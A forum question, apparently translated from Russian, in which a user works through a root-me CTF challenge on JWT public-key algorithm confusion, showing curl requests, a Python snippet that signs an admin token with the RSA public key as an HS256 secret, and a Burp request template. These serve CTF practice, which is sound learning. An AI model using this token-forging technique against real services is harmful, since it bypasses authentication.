Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
H
H
HexUserHex2020-05-19 13:32:12
Penetration test
HexUserHex, 2020-05-19 13:32:12

CTF JSON Web Token (JWT) - Public key(root-me)?

Good afternoon,
for several days now I have not been able to go through this CTF root-me , the problem occurs precisely at the last stage .. which I already sort of figured out how to go through.

Statement
You find an API with 3 endpoints:
    /key (accessible with GET)
    /auth (accessible with POST)
    /admin (accessible with POST)

There is sure to be important data in the admin section, access it!


I get a public key.
1. curl challenge01.root-me.org/web-serveur/ch60/key
I bring it to a human format:
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxDoTVDg3znEGjlTjHb+l
Ev+KuEav5DYdTP+QhQEUl/h2w9BEEBiIz7Sg0BDH2HlacE9dYoIhzBCPSKG6gOqt
FIlhNts2S7vuPJq7RyNgDkNi829ah7V914yTqkpKTaqCHN7psvxjefRnijNxMUoI
0MWBvwZkDRBS6yVCxzLcgrAO5nBZHHd+f5pTE3qIfenEpyGeIElj0g1JkZQlkJz8
13eH+nvJP7wcwciU8CvSKs3BWvw4bSE2BkzvE1bsoi8Z2fha0RkTwvX2ENdF8XvB
KrNhIFTDqmMQGl3qMA8WhJG+aBuNJJDNaOv9VUut9gfUzzEmoHWm5wksArHeOprt
6wIDAQAB
-----END PUBLIC KEY-----


I receive my token
2.
curl -X POST -d "username=admin;" http://challenge01.root-me.org/web-serveur/ch60/auth


{ "Here is your token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluOyJ9.Lu0uyubEQjoSDKcS8VKD6ou6RCt-8Emi7TGRmpxLeT8hD7Vb79EfVAlRqJTPDpLJmGoJLvBr6MNZXUgzU10VSi-oMWufM6P8pL4z68riQOdAfO9-7w3ut1CNM_yIaqi_HMdAEyb4ue3qlxBhAtCSVGhvQBLt-0hPXh6Gm6ZklfBoXMscWhJtvCLqrP5s_pb5otneS0AT0djohvUc466o_maOA-Silu8Sjlte7NzTcx7P6pJkKiBqv7cBVyfuVmZewB0vNghQL8mOzalV_utoow4teMTt3wFc8VYdBczimWchkSQKJhUi60kocNdVlv-xD1x6Gl43Jmky1DTFy28-kg", "of result": "the Hello admin;"}

3. A little reading, I came to the conclusion that the third step is to send a token signed by the received public key (alg: RSA) while the server expects a token signed by HMAC (HS256 / HS512) thanks to this the server will automatically accept my token, I try to immediately create and sign a token in python.

import jwt

public = open('key.pem', 'r').read()
print public
print jwt.encode({"username":"admin"}, key=public, algorithm='HS256')


At the input I get my token which I need to send:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.haPF1qR7R7syw7yjl2xCO6sXXV2ChDddb9AEsGgNgW4


Sending my signed token:
curl -X POST http://challenge01.root-me.org/web-serveur/ch59/admin -H 'Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.haPF1qR7R7syw7yjl2xCO6sXXV2ChDddb9AEsGgNgW4'
{"message": "I was right, you are not able to break my super crypto! I use HS512 so no need to have a strong secret!"}


Decided: for anyone interested, here is a request for burp-a:
POST /web-serveur/ch60/admin HTTP/1.1
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Authorization: Bearer твой_подписанный_токен
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

0 answer(s)
Similar questions
L
Levantiya Mandrogorovna2018-12-30 11:21:49
How to audit a Web project for penetration? 1Reply
R
Raven0002019-01-03 21:32:28
What literature can you recommend on hacking and pentesting websites? 1Reply
H
HandOfShaman2014-08-27 14:23:11
What books do you know for a beginner pentester? 2Reply
M
Maxim2022-04-06 17:18:14
Where to start to become a pentester? 0Reply
M
my_drone2017-10-07 04:53:38
How to make Python code work after catching an error but with new values ​​in a variable? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question